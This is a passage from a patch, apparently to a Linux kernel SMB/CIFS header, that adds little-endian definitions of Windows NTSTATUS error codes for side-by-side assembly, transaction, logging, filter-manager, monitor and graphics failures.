++#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
++#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
++#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
++#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
++#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
++#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
++#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
++#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
++#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
++#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
++#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
++#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
++#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
++#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
++#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
++#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
++#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
++#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
++#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY	\
++	cpu_to_le32(0xC0150012)
++#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
++#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
++#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
++#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
++#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
++#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
++#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
++#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
++#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT	\
++	cpu_to_le32(0xC015001C)
++#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
++#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
++#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
++#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
++#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
++#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
++#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
++#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
++#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
++#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
++#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
++#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
++#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
++#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
++#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
++#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
++#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
++#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
++#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
++#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
++#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
++#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
++#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
++#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
++#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
++#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
++#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
++#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
++#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
++#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
++#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
++#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
++#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
++#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
++#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
++#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
++#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION	\
++	cpu_to_le32(0xC0190024)
++#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
++#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
++#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
++#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
++#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
++#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
++#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
++#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
++#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
++#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
++#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
++#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
++#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
++#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
++#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
++#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
++#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
++#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
++#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
++#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
++#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
++#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
++#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
++#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
++#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
++#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
++#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
++#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
++#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
++#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
++#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
++#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
++#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
++#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION	\
++	cpu_to_le32(0xC0190053)
++#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
++#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
++#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
++#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
++#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
++#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
++#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
++#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
++#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
++#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
++#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
++#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
++#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
++#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
++#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
++#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
++#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
++#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
++#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
++#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
++#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
++#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
++#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
++#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
++#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
++#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
++#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
++#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
++#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
++#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
++#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
++#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
++#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
++#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
++#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
++#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
++#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
++#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
++#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
++#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
++#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
++#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
++#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
++#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
++#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
++#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
++#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
++#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
++#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
++#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
++#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
++#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
++#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
++#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
++#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
++#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
++#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
++#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
++#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
++#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
++#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
++#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
++#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
++#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
++#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
++#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
++#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
++#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
++#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
++#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
++#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
++#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
++#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
++#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
++#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
++#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
++#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
++#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
++#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
++#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
++#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
++#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
++#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
++#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
++#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
++#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
++#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
++#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
++#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
++#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
++#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK	\
++	cpu_to_le32(0xC01D0006)
++#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK	\
++	cpu_to_le32(0xC01D0007)
++#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
++#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
++#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
++#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
++#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
++#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
++#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
++#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
++#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
++#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
++#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
++#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
++#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
++#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
++#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
++#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
++#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
++#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
++#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
++#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
++#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
++#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
++#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
++#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
++#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
++#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
++#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED	\
++	cpu_to_le32(0xC01E0302)
++#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
++#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
++#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
++#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
++#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
++#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE	\
++	cpu_to_le32(0xC01E0310)
++#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE	\
++	cpu_to_le32(0xC01E0311)
++#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
++#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
++#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
++#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
++#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
++#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
++#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET	\
++	cpu_to_le32(0xC01E031B)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
++#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
++#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
++#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
++#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
++#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
++#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION	\
++	cpu_to_le32(0xC01E0325)
++#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES	\
++	cpu_to_le32(0xC01E0326)
++#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE	\
++	cpu_to_le32(0xC01E0328)
++#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET	\
++	cpu_to_le32(0xC01E0329)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
++#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
++#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE	\
++	cpu_to_le32(0xC01E032E)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
++#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
++#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
++#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
++#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
++#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER	\
++	cpu_to_le32(0xC01E0334)
++#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
++#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
++#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
++#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
++#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
++#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
++#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
++#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
++#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
++#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
++#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
++#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
++#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT	\
++	cpu_to_le32(0xC01E0341)
++#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
++#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
++#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION	\
++	cpu_to_le32(0xC01E0345)
++#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED \
++	cpu_to_le32(0xC01E0346)
++#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
++#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
++#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
++#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
++#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON	\
++	cpu_to_le32(0xC01E034D)
++#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
++#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
++#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS	\
++	cpu_to_le32(0xC01E0350)
++#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
++#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
++#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
++#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
++#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
++#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN	\
++	cpu_to_le32(0xC01E0357)
++#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT	\
++	cpu_to_le32(0xC01E0358)
++#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
++#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION	\
++	cpu_to_le32(0xC01E035A)
++#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
